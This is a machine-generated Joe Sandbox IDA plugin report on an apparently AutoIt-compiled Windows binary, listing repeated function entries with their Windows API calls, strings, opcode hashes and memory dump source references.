                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_wcslen
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 624084870-1403004172
                                      • Opcode ID: 1cd706e8cc0a7400549dee08d7d0421702b9d946cec317bd79e800679f07b731
                                      • Instruction ID: 15b49fc37b8f57de111d95ec962da7feb3c1bee7debb303143d90e1fa4a93f11
                                      • Opcode Fuzzy Hash: 1cd706e8cc0a7400549dee08d7d0421702b9d946cec317bd79e800679f07b731
                                      • Instruction Fuzzy Hash: 3601F77168014CAACF14EB95CD619FF7BA89F11340F10002FAA1777291EA289E0CC6BA
                                      Function 004F1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                        • Part of subcall function 004F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004F3CCA
                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 004F1CC8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_wcslen
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 624084870-1403004172
                                      • Opcode ID: 71742916927c0b1582ccfbd0853b3513944b86169d99fa1ce06624497fcb2013
                                      • Instruction ID: 43965ef0b78a1e6675ec1fc11330246e7c9a49329a942bf06a47441f9d075159
                                      • Opcode Fuzzy Hash: 71742916927c0b1582ccfbd0853b3513944b86169d99fa1ce06624497fcb2013
                                      • Instruction Fuzzy Hash: E5012B71A4014CA7CF04EB96CE11AFF7BA89B11340F10002FB91273291EA289F08D27A
                                      Function 004AA4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 004AA529
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Init_thread_footer_wcslen
                                      • String ID: ,%V$3yN
                                      • API String ID: 2551934079-329773040
                                      • Opcode ID: 9684d172924d841a6d8e998e8c7ee4fdb5d77bdc1b8fd3f992b21876d0551f8f
                                      • Instruction ID: 769c7747eb03aea2bc8514db4bc0c4f1f742dfe20ef7d005df6d749a4e869161
                                      • Opcode Fuzzy Hash: 9684d172924d841a6d8e998e8c7ee4fdb5d77bdc1b8fd3f992b21876d0551f8f
                                      • Instruction Fuzzy Hash: 3F012B31B006109BCA14F76EDC17AAE3754AB26715F50006FF5125B2C2EF5CAD05CAAF
                                      Function 00528172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00563018,0056305C), ref: 005281BF
                                      • CloseHandle.KERNEL32 ref: 005281D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: \0V
                                      • API String ID: 3712363035-3349794036
                                      • Opcode ID: f7f09398b91dbd8fcbb09ef99c9b97e1fa0214c3f423917a3b92eedabcf63b68
                                      • Instruction ID: 612dd928ac7e4958e6aa571ee8319110726e844b6cb67d3e9e30ba270584938b
                                      • Opcode Fuzzy Hash: f7f09398b91dbd8fcbb09ef99c9b97e1fa0214c3f423917a3b92eedabcf63b68
                                      • Instruction Fuzzy Hash: E3F05BB1540300BAE3206765AC49FB73E9CEF15774F000425FB08D6192D5B54A1C92F8
                                      Function 0051747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: 3, 3, 16, 1
                                      • API String ID: 176396367-3042988571
                                      • Opcode ID: f1174e4bd6ec779a2f29935d721e07f844fabc3c8b16b75556ec799253f2d114
                                      • Instruction ID: 538a6138b7db8e2b0b706bce24407e206bdad5e88e47ecb269e4affd8ad63d0e
                                      • Opcode Fuzzy Hash: f1174e4bd6ec779a2f29935d721e07f844fabc3c8b16b75556ec799253f2d114
                                      • Instruction Fuzzy Hash: 4DE02B4220432010A731127EACC19FF5E99EFCD7A0714182FF981C2267EAD88DD193B4
                                      Function 004F0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004F0B23
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Message
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 2030045667-4017498283
                                      • Opcode ID: 7142fed2c023e29da25ca6f8610ae5482f836637b3aa23a8f7ebffc80574d393
                                      • Instruction ID: cc5cf3cc9812975eaba954651165b719cd2a3fef5de19c0894d3451b7036e88f
                                      • Opcode Fuzzy Hash: 7142fed2c023e29da25ca6f8610ae5482f836637b3aa23a8f7ebffc80574d393
                                      • Instruction Fuzzy Hash: 6CE0D83124431826D22436D57C03F9D7EC49F16B59F10042FFB58555C38AE5649446ED
                                      Function 004B0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004AF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,004B0D71,?,?,?,0049100A), ref: 004AF7CE
                                      • IsDebuggerPresent.KERNEL32(?,?,?,0049100A), ref: 004B0D75
                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0049100A), ref: 004B0D84
                                      Strings
                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004B0D7F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                      • API String ID: 55579361-631824599
                                      • Opcode ID: 2c2428ab08213172e3138fbd4a9f48ee4ae79cad4dd141270754f8c7f18df030
                                      • Instruction ID: 9a5bbe16ff7cc5b1f5161eb0b951909560e0580425f80058efd54b26c3496c86
                                      • Opcode Fuzzy Hash: 2c2428ab08213172e3138fbd4a9f48ee4ae79cad4dd141270754f8c7f18df030
                                      • Instruction Fuzzy Hash: 13E065742007118BD3709FB9E4043577FF8BF21745F00497EE482C6692DBB8E4498BA5
                                      Function 004AE398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 004AE3D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Init_thread_footer
                                      • String ID: 0%V$8%V
                                      • API String ID: 1385522511-3136191653
                                      • Opcode ID: 4b16991ac1b04f05619212b852b14602a45bf5791716e48b617a356fc5954855
                                      • Instruction ID: 6e958bb44136838e479fa23670b7a5ed23bffd3f03b72fdbefdb35db96936593
                                      • Opcode Fuzzy Hash: 4b16991ac1b04f05619212b852b14602a45bf5791716e48b617a356fc5954855
                                      • Instruction Fuzzy Hash: 90E02631400D10CBCE28971EB894A893391BB36324F5001BBE923CF2D1BB786C45A75E
                                      Function 004ED21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: %.3d$X64
                                      • API String ID: 481472006-1077770165
                                      • Opcode ID: dd64b531539a2ac419aaf462469679d648f27bcfc5c1112f70f1db9fa03ff98d
                                      • Instruction ID: fef27de6d30b950ba9e78b38d29ab30d73173d578adbecfe0306ccf63e06bde3
                                      • Opcode Fuzzy Hash: dd64b531539a2ac419aaf462469679d648f27bcfc5c1112f70f1db9fa03ff98d
                                      • Instruction Fuzzy Hash: 02D01261C08148EACB5096E1DC458B9B77CBF19342F508493FA16A1040D62CD50EA76B
                                      Function 00522356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0052236C
                                      • PostMessageW.USER32(00000000), ref: 00522373
                                        • Part of subcall function 004FE97B: Sleep.KERNEL32 ref: 004FE9F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: 384058c71bf0bcb2803386d168df114a63c9e612560f33e39b9096019b5e5192
                                      • Instruction ID: 0f4d101e2fb083a0738b548568e936ff7f75de23e2f1ba87e5f979d6d3c41083
                                      • Opcode Fuzzy Hash: 384058c71bf0bcb2803386d168df114a63c9e612560f33e39b9096019b5e5192
                                      • Instruction Fuzzy Hash: F0D0A932380300BAE274A7319C0FFCA6A04AB16B01F000A067701AA0E1C8F0B80A8A18
                                      Function 00522322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0052232C
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0052233F
                                        • Part of subcall function 004FE97B: Sleep.KERNEL32 ref: 004FE9F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: 200321084b695f8ff6ef8369f80d523dae6c09d97376b30eb1523d3ea86c8653
                                      • Instruction ID: 5a37eb4904e2440925f41009116eaca30eba64fb0c721b4c7b3dedf90a929552
                                      • Opcode Fuzzy Hash: 200321084b695f8ff6ef8369f80d523dae6c09d97376b30eb1523d3ea86c8653
                                      • Instruction Fuzzy Hash: CCD0A932390300B6E274A7319C0FFCA6E04AF11B01F000A067705AA0E1C8F0A80A8A14